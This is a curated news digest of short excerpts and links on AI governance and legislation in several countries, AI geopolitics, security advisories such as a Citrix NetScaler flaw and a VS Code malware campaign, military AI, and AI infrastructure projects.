Governance, Regulation, and Legislation
ITU to host AI for Good Global Summit in Geneva
(DigWatch) The International Telecommunication Union (ITU) will organise the AI for Good Global Summit from 7 to 10 July 2026 at Palexpo in Geneva, Switzerland, according to an official announcement by the Swiss authorities. On 6 and 7 July, the United Nations Global Dialogue on AI Governance will take place ahead of the summit. The dialogue is convened within the framework of a UN General Assembly resolution and will bring together policymakers, experts, and representatives of civil society to discuss approaches to AI governance. – https://dig.watch/updates/itu-to-host-ai-for-good-global-summit-in-geneva
Data watchdogs seek safeguards in biotech law
(DigWatch) The European Data Protection Board and the European Data Protection Supervisor have issued a joint opinion on the proposed European Biotech Act. Both bodies support efforts to streamline biotech regulation and modernise clinical trial rules. Regulators welcome plans to harmonise the application of the Clinical Trials Regulation and create a single legal basis for processing personal data in trials. Greater legal clarity for sponsors and investigators is seen as a key benefit. – https://dig.watch/updates/data-watchdogs-seek-safeguards-in-biotech-law
AI-EFFECT builds EU testing facility for AI in critical energy infrastructure
(DigWatch) As Europe moves towards its climate-neutrality goals, integrating AI into energy systems is being presented as a way to improve efficiency, resilience, and sustainability. The EU-funded AI-EFFECT project is developing a European testing and experimentation facility (TEF) to support the development and adoption of AI solutions for the energy industry while ensuring safety, reliability, and compliance with EU regulations. The TEF is described as a virtual network linking existing laboratories and computing resources across several EU countries. It is designed to provide standardised testing environments, risk and certification workflows, and replicable methods for developing, testing, and validating AI applications for critical energy infrastructures under diverse, real-world conditions. – https://dig.watch/updates/ai-effect-eu-energy-ai-testing-facility
UK pushes platforms to tackle AI abuse and online violence against women
(DigWatch) The Department for Science, Innovation and Technology has called on online service providers to strengthen measures against digital harms targeting women and girls, as part of a commitment to halve such violence within a decade. In a letter published on 23 March 2026, Liz Kendall outlined expectations for platforms operating under the Online Safety Act. The letter states that the government has strengthened criminal law and regulatory frameworks, including new offences related to harmful pornographic practices and intimate image abuse. – https://dig.watch/updates/uk-pushes-platforms-to-tackle-ai-abuse-and-online-violence-against-women
Scotland sets up national AI agency
(DigWatch) The Scottish government has launched a dedicated national agency to drive AI strategy and support local tech companies. Leaders say this effort could help boost the economy and establish the nation as a hub for AI development. Scotland’s strategy highlights existing tech firms and data projects, including plans for major computing campuses and partnerships with global technology companies. Several research institutions and supercomputing initiatives are contributing to innovation. – https://dig.watch/updates/scotland-sets-up-national-ai-agency
Social media ban in Ecuador targets youth crime recruitment
(DigWatch) A proposal to restrict minors’ online activity is gaining momentum in Ecuador, where lawmakers are considering a social media ban for children under 15 as part of a broader response to rising organised crime. Under discussion in the National Assembly, the initiative introduced by Assembly member Katherine Pacheco Machuca would amend the Code of Childhood and Adolescence to block access to platforms enabling public interaction, content sharing, and messaging. The proposal defines social networks broadly, covering services that allow users to create accounts, connect with others, and exchange content. – https://dig.watch/updates/ecuador-social-media-ban
India’s AI Middle Path Offers Lessons for Australia and New Zealand
(Archana Atmakuri – Tech Policy Press) Global debates about artificial intelligence are increasingly focused on how to close the “AI divide” between countries that build advanced systems and those that largely consume them. Recent gatherings such as the India AI Impact Summit in New Delhi have highlighted this shift, with leaders debating how AI can be developed and governed in the Global South rather than relying solely on models emerging from Washington, Brussels or Beijing. While the ‘Global South’ framing often focuses on countries in Africa, Latin America and Asia, these debates also hold up a mirror for middle powers in Oceania such as Australia and New Zealand. For Canberra and Wellington, AI is still mostly treated as a technical and regulatory problem: something to be managed with principles, risk frameworks and standards. That is necessary, but it is not enough to create a national advantage. As AI becomes basic infrastructure for economies and societies, middle powers face a harder question: do they remain passengers in someone else’s AI ecosystem, or invest in becoming architects of their own? The answer does not lie in trying to out‑spend the United States, European Union or out‑scale China. It lies in a middle path that puts sovereignty first: treating key AI capabilities as public infrastructure, grounding governance in local data rules, and centering the voices of affected communities. What would such a middle path look like for Australia and New Zealand? – https://www.techpolicy.press/indias-ai-middle-path-offers-lessons-for-australia-and-new-zealand/
Vietnam’s New AI Law Balances Innovation Push With Tight State Control
(Lam Le – Tech Policy Press) On March 1, Vietnam became the first country in Southeast Asia to have a comprehensive AI law come into effect. The Law on Artificial Intelligence draws on preceding legislation, notably the EU’s AI Act, which includes risk-based management of AI. It also “ensures a higher safety level than South Korea’s basic framework, (and) promotes strong development like Japan,” Tran Van Son, deputy director of the National Institute of Digital Technology and Digital Transformation under the Ministry of Science and Technology, said at a press conference last December. The law came into effect at a time when Hanoi is pushing for the “era of national rise,” a term coined by Communist Party chief To Lam in 2024 to reflect his vision for a high-income developed Vietnam by 2045. Among the main engines of this transformation are tech, while efficient institutions act both as facilitators of growth and the brakes to ensure digital sovereignty, safety and security in the digital space. This vision has translated into multiple tech-related laws and directives being passed and updated steadfastly since 2024, including the Personal Data Protection Law, which came into effect last January, and the revised Cybersecurity Law passed last December. – https://www.techpolicy.press/vietnams-new-ai-law-balances-innovation-push-with-tight-state-control/
America’s AI Governance Crisis Is a Democracy Crisis
(Laura MacCleery – Tech Policy Press) On Friday, the White House released its national framework for artificial intelligence, which urges Congress to preempt state laws, avoid any new regulatory body, and shield developers from liability. It arrives amidst a nearly 300-page draft bill from Sen. Marsha Blackburn (R-Tenn.) and expected legislation from Rep. Jay Obernolte (R-Calif.), chair of the House AI Task Force, who has said he is working on a bill on preemption. The conventional reading has been that AI regulation is hard, technology moves too fast, lawmakers lack technical expertise, and encouraging innovation requires doing nothing to get in the way. That reading is wrong. What we are witnessing is not just a failure to govern AI. It is the predictable outcome of a decades-long project to dismantle the democratic infrastructure that would make governance possible. The industry and its allies have been preparing this ground for decades, but it’s now inescapable. Colorado’s landmark AI Act, the first comprehensive state law of its kind, was just stripped down to the studs. Gone is the duty of care—a common standard in product liability—a ban on algorithmic discrimination, and impact assessments. More than 150 industry lobbyists apparently worked to gut the new law. State Sen. Julie Gonzales (D-34) said on the Senate floor that “[a]ll 35 of us in this building know that we too have witnessed the stunning brunt of AI leverage.” – https://www.techpolicy.press/americas-ai-governance-crisis-is-a-democracy-crisis/
Trump and GOP Lawmakers Push for New National AI Legislation
(Ben Lennett – Tech Policy Press) The Trump administration unveiled a new National AI Legislative Framework, outlining its preferred approach to establish a unified federal standard for artificial intelligence governance. The framework calls for new protections spanning children, intellectual property and energy costs, while also enacting a sweeping federal preemption of state AI laws. The announcement comes as the White House and Republicans in Congress are also moving to translate this framework into legislation. One new proposal led by Sen. Marsha Blackburn (R-Tenn.), dubbed the “TRUMP AMERICA AI Act,” attempts to overcome prior congressional resistance, including from Republicans, by weaving together protections for children, intellectual property and conservative speech alongside its state preemption measures. The act is being framed as a solution to protect the “‘4 Cs’” previously coined by influential conservative operative Mike Davis, “children, creators, conservatives, and communities,” while ensuring “American AI companies can innovate without cumbersome regulation.”. This renewed push follows the unsuccessful effort, led by Sen. Ted Cruz (R-Texas) last year, to pass a 10-year moratorium on states enforcing their own AI laws. After the measure passed the House in July, the Senate voted 99-1 to drop a version of the moratorium that was inserted into a budget reconciliation bill. Following that legislative defeat, President Donald Trump signed an executive order in December to target state AI regulations. The order charged the Department of Justice with developing a task force to challenge state AI laws and directed the Commerce Department to build a target list of “onerous” state regulations that hamper innovation, among other measures. And it tasked Congress with passing a “minimally burdensome national standard” that would “forbid” conflicting state AI laws. GOP congressional leadership and Blackburn are among those now seeking to codify the White House’s wishes into legislative text, hoping it can make it through Congress. – https://www.techpolicy.press/trump-and-gop-lawmakers-push-for-new-national-ai-legislation/
Geostrategies
Assessing North Korea’s AI ambitions
(Lami Kim – IISS) The final report of North Korea’s 9th Party Congress outlined ambitious plans to integrate artificial intelligence (AI) into both its civilian and military sectors over the next five years. On the civilian side, the report stressed the urgent need to develop AI alongside energy and space technologies, describing them as core technologies underpinning advanced industrial development. For the military, it identified AI-enabled uninhabited attack systems as a key modernisation objective, alongside electronic-warfare and counterspace capabilities, while maintaining North Korea’s traditional emphasis on nuclear weapons. Pyongyang’s emphasis on AI is not new. North Korean media has repeatedly highlighted the potential impact of AI on both economic development and military modernisation, and its efforts to operationalise the technology. The regime has claimed that it has developed AI-equipped autonomous reconnaissance and attack uncrewed aerial vehicles (UAVs) and that its guided multiple rocket launchers incorporate AI-guidance systems. These developments reflect a recognition that its principal adversaries – the United States and South Korea – are increasingly integrating AI into their military operations and that North Korea cannot afford to fall behind in this emerging technological competition. – https://www.iiss.org/online-analysis/online-analysis/2026/03/assessing-north-koreas-ai-ambitions/
Security and Surveillance
Citrix NetScaler critical flaw could leak data, update now
(Pierluigi Paganini, Security Affairs) Citrix issued security updates for two NetScaler vulnerabilities, including a critical memory overread, tracked as CVE-2026-3055 (CVSS score of 9.3), that allows unauthenticated attackers to leak sensitive data. The flaw CVE-2026-3055 is an insufficient input validation leading to memory overread, it can be triggered only if Citrix ADC or Citrix Gateway are configured as a SAML IDP. – https://securityaffairs.com/189908/security/citrix-netscaler-critical-flaw-could-leak-data-update-now.html
North Korea-linked threat actors abuse VS Code auto-run to spread StoatWaffle malware
(Pierluigi Paganini – Security Affairs) North Korea-linked threat actor Team 8 behind the Contagious Interview campaign is spreading StoatWaffle malware through malicious Microsoft Visual Studio Code projects. Since late 2025, they have abused the “tasks.json” auto-run feature in Microsoft Visual Studio Code to execute code whenever a folder is opened, downloading payloads from the web across operating systems, making this tactic both stealthy and effective. “In Contagious Interview campaign, Team 8 has been mainly using OtterCookie. Starting around December 2025, Team 8 started using new malware. We named this malware StoatWaffle.” reads the report published by NTT Security. “Team 8 leverages a project related to blockchain as a decoy. This malicious repository contains .vscode directory that contains tasks.json file. If a user opens and trusts this malicious reporitory with VSCode, it reads this tasks.json file.” – https://securityaffairs.com/189880/security/north-korea-linked-threat-actors-abuse-vs-code-auto-run-to-spread-stoatwaffle-malware.html
Enterprise Cybersecurity Software Fails 20% of the Time, Warns Absolute Security
(Danny Palmer – Infosecurity Magazine) Endpoint cybersecurity software fails to protect one in five enterprise devices, leaving organizations vulnerable to cyber threats, research by Absolute Security has warned. This protection gap means that organizations face the equivalent of 76 days a year in which they’re providing cybercriminals which increased access to their network, potentially leading to data breaches and downtime. The findings come from Absolute Security’s 2026 Resilience Risk Index. The report, published on March 23, is based on analysis of device-level telemetry across tens of millions of enterprise endpoints, which have been validated as using endpoint management and cybersecurity software. Christy Wyatt, president and CEO of Absolute Security, commented, “Cyber-attacks are inevitable, downtime is optional.”. “The cybersecurity industry has rushed to provide innovations that detect and prevent threats, unfortunately it’s lagging when it comes to ensuring that tools can remain operational when they are needed most,” she added. – https://www.infosecurity-magazine.com/news/cybersecurity-software-failure-20/
Defence, Intelligence, and Warfare
How Iran, Anthropic-DoD Dispute Show the Need for Protective AI
(Chris Rogers – Just Security) U.S. and Israeli attacks on Iran mark yet another escalation in a period of rapidly expanding U.S. military activity stretching from Yemen and Nigeria to the Caribbean, Venezuela, and now direct confrontation with Tehran. These operations are unfolding at a moment when AI is increasingly embedded into military operations, including in Iran, from intelligence analysis and operational planning to target development and decision-support. At the same time, a public rupture between the U.S. Department of Defense and Anthropic—one of the few AI developers that attempted to place guardrails on military use of its models—has thrown the stakes of the military AI debate into sharp relief. These developments are not unrelated. Together, they point to a fundamental imbalance in current military AI: investment, institutional attention, and partnership incentives are disproportionately skewed toward “maximum lethality,” speed, and operational scale, while AI capabilities that ensure international humanitarian law (IHL) compliance, or that could strengthen civilian protection, remain de-prioritized and underfunded. – https://www.justsecurity.org/134321/iran-anthropic-dod-protective-ai/
Frontiers
Terafab initiative from Elon Musk targets AI and space computing
(DigWatch) Elon Musk unveiled his ambitious Terafab project in Austin, describing it as the ‘most epic chip-building exercise in history.’ The initiative, led by Tesla, xAI, and SpaceX, aims to produce 1 trillion watts of compute power annually, much of it intended for space applications. The project will start with a state-of-the-art semiconductor manufacturing facility in Austin, supporting AI development, humanoid robotics, and space data centres. Musk highlighted current supply chain limitations, stating that building Terafab is essential to secure the chips his companies need. – https://dig.watch/updates/terafab-musk-targets-ai-and-space-computing
AI and the End of Territorial Time
(Eli Lehrer – Tech Policy Press) The arc of human technological progress can be described as a long campaign against the limits imposed by time. Paleolithic humans stole a few uncertain hours from the night with smoky fires. Gaslight stretched the evening further. Railroads and ocean navigation forced continents to agree on the hour. Electricity turned night into a simulacrum of day. These shifts matter because historians of deep structural change rarely begin with ideology or politics but look instead to daily rhythms. When societies reorganize how people mark and measure a day, deeper transformations follow. After the Black Death, English laborers began treating time itself as something that could be bought and sold. The Second Industrial Revolution demanded precision to the minute, disciplining life to factory clocks, school schedules, and centralized grids. Now a global digital network infused with artificial intelligence may inaugurate another chapter—not by simply extending the day or demanding finer synchronization, but by altering the relationship between time and geography that has structured human life. Territorial time is losing authority as time zones matter less for participation: Even before the pandemic, one major study of an international firm showed that over 40 percent of meetings took place outside of at least one person’s normal business hours. Responsiveness drifts toward the instantaneous, even when interaction is asynchronous. And physical presence, though far less necessary for coordination, may be reemerging as a signal of authenticity. Together, these developments suggest the outlines of a new temporal order. – https://www.techpolicy.press/ai-and-the-end-of-territorial-time/
Anthropic outlines AI agent workflows for scientific computing
(DigWatch) Anthropic has published a post describing how AI agents can be used in multi-day coding workflows for well-scoped, measurable scientific computing tasks that do not require constant human supervision. In the article, Anthropic researcher Siddharth Mishra-Sharma explains how tools such as progress files, test oracles, and orchestration methods can be used to manage long-running software work. – https://dig.watch/updates/anthropic-ai-agents-scientific-computing
NVIDIA introduces infrastructure-level security model for autonomous AI agents
(DigWatch) OpenShell, an open-source runtime introduced by NVIDIA, is designed to support the secure deployment of autonomous AI agents within enterprise environments. According to NVIDIA, OpenShell applies security controls at the infrastructure level rather than within the model or application layer. The runtime ensures that each agent operates inside an isolated sandbox, where system-level policies define and enforce permissions, resource access, and operational constraints. – https://dig.watch/updates/nvidia-introduces-infrastructure-level-security-model-for-autonomous-ai-agents
Corning licenses new ferrule technology to boost AI data centre fibre density
(DigWatch) Corning has expanded its data centre connectivity portfolio through a licensing agreement with US Conec, gaining access to PRIZM TMT optical ferrule technology designed to increase fibre density within data centre environments, particularly for AI infrastructure. The move reflects the growing pressure on data centre operators to handle higher connection densities as AI workloads scale and cluster architectures become more demanding. – https://dig.watch/updates/corning-licenses-new-ferrule-technology-to-boost-ai-data-centre-fibre-density